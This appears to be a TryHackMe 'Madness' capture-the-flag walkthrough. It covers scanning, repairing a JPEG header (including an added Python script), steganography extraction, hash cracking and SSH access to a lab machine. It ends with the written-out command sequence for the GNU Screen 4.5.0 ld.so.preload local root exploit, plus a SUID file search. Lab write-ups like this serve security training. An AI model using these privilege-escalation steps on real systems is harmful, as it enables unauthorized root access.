Today we will take a look at TryHackMe: Madness. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.
Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.152.45
Let’s check the site
As you can see, there is a picture icon above. Let’s click on it.
There is no picture. Let’s download it and make some changes.
Command: wget http://10.10.152.45/thm.jpg
The .jpg file is corrupted. Let’s fix it.
List of file signatures - Wikipedia
Command: hexeditor thm.jpg
Now let’s try again.
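The signature check and header fix done by hand in hexeditor above can also be scripted. This is an added example, not part of the original writeup: it assumes the damage is limited to the first 12 bytes and that the original was a JFIF JPEG; the function names are hypothetical and SAMPLE is constructed data, not the room's file.

```python
# Identify a file by its leading magic bytes and restore a JFIF header.
SIGNATURES = {
    "jpeg-jfif": bytes.fromhex("FFD8FFE000104A4649460001"),
    "png": bytes.fromhex("89504E470D0A1A0A"),
    "gif": b"GIF89a",
}
JFIF = SIGNATURES["jpeg-jfif"]

# Constructed sample: PNG-style header in front of a minimal JPEG body.
SAMPLE = (
    bytes.fromhex("89504E470D0A1A0A00000001")  # wrong first 12 bytes
    + bytes.fromhex("0100000100010000")        # rest of the JFIF APP0 segment
    + b"\xff\xdb" + bytes(8)                   # DQT marker + dummy payload
    + b"\xff\xda" + bytes(8)                   # SOS marker + dummy payload
    + b"\xff\xd9"                              # EOI marker
)


def identify(data: bytes) -> str:
    """Return the name of the first signature matching the start of data."""
    for name, magic in SIGNATURES.items():
        if data.startswith(magic):
            return name
    return "unknown"


def has_jpeg_body(data: bytes) -> bool:
    """Heuristic: JPEG markers (DQT, SOS) are present and the file ends in EOI."""
    return data.endswith(b"\xff\xd9") and b"\xff\xdb" in data and b"\xff\xda" in data


def repair_header(data: bytes) -> bytes:
    """Overwrite the first 12 bytes with the JFIF signature, keeping the length."""
    if identify(data) == "jpeg-jfif":
        return data  # header already correct, nothing to do
    if not has_jpeg_body(data):
        raise ValueError("no JPEG markers found; refusing to rewrite the header")
    return JFIF + data[len(JFIF):]


if __name__ == "__main__":
    print("before:", identify(SAMPLE), "| jpeg body:", has_jpeg_body(SAMPLE))
    print("after: ", identify(repair_header(SAMPLE)))
```

A mismatch between the extension and `identify()` is the same thing the signature table shows by eye; the script only rewrites when the rest of the file still looks like a JPEG.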
We are provided with a hidden directory.
I was just checking and came across something like this.
There was another hint in the source code.
Open Burp Suite and check them one by one.
And that’s it. We got different results.
When we look at the site, we get such a result.
Maybe the image we downloaded is needed again, because this is the steganography code.
Command: steghide info thm.jpg
Command: steghide --extract -sf thm.jpg
Let’s try to crack the hash we got.
The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
I tried to access the information we have with ssh, but it didn’t work. After a while, I remembered that it was in the form of supplements.
We found the password, let’s enter.
Command: find / -perm -u=s 2>/dev/null
We see something different. Let’s check the exploit.
Offensive Security's Exploit Database Archive
GNU Screen 4.5.0 - Local Privilege Escalation. Local exploit for the Linux platform.
I created the files in my terminal and transferred them to the target terminal
And I entered the commands.
Command: gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
Command: gcc -o /tmp/rootshell /tmp/rootshell.c
Command: echo "[+] Now we create our /etc/ld.so.preload file…"
Command: cd /etc
Command: umask 000
Command: screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
Command: echo "[+] Triggering…"
Command: screen -ls
And now we are root.
“If you have any questions or comments, please do not hesitate to write. Have a good day.”